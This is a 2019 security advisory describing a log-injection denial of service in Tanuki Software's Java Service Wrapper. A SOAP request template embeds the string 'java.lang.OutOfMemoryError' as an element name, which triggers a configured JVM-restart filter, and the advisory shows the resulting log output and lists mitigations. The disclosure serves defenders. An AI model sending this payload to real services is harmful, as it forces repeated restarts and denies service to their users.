Process restart / Denial of Service by logfile injection on Tanuki Software Java Service Wrapper filter action

Recently, when I played with logfile injection, I found a nice catch in the filter action of Tanuki Software’s Java Service wrapper when OutOfMemoryError Detection is used.

The simplest way to do this is as follows:
Example:
wrapper.filter.trigger.1=java.lang.OutOfMemoryError
wrapper.filter.action.1=RESTART

This sample configuration might also be used in the production environment?

We just need to send a payload that will be propagate to the wrapper.log file at runtime. In my case, I addressed a Soap IF and created a request with errors to cause an unmarshalling error.

Build a faulty SOAP request that ensures that the string java.lang.OutOfMemoryError is written in the log file, I added the non existing “java.lang.OutOfMemoryError” element to the namespace:

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:ns2=......>
   <soap:Header/>
   <soap:Body>
      <ns2:SoapOperation>
		.....
        <ns2:validElement><ns2:java.lang.OutOfMemoryError>Inject Me</ns2:java.lang.OutOfMemoryError></ns2:validElement>
		.....
      </ns2:SoapOperation>
   </soap:Body>
</soap:Envelope>

The goal is achieved, the false positive leads to the process restart:

INFO   | jvm 1    | 2019/08/21 13:38:13 | DefaultValidationEventHandler: [ERROR]: unexpected element (........., local:"java.lang.OutOfMemoryError"). Expected elements are (none)
STATUS | wrapper  | 2019/08/21 13:38:13 | The JVM has run out of memory.  Restarting JVM.

Mitigation:

  • do not use this special filter action
  • or the application needs to catch such exceptions, otherwise it will be visible in wrapper.log

Disclaimer

The information provided is released “as is” without warranty of any kind. The publisher disclaims all warranties, either express or implied, including all warranties of merchantability. No responsibility is taken for the correctness of this information. In no event shall the publisher be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if the publisher has been advised of the possibility of such damages.

The contents of this advisory are copyright (c) 2019 by psytester and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.

Written on August 29, 2019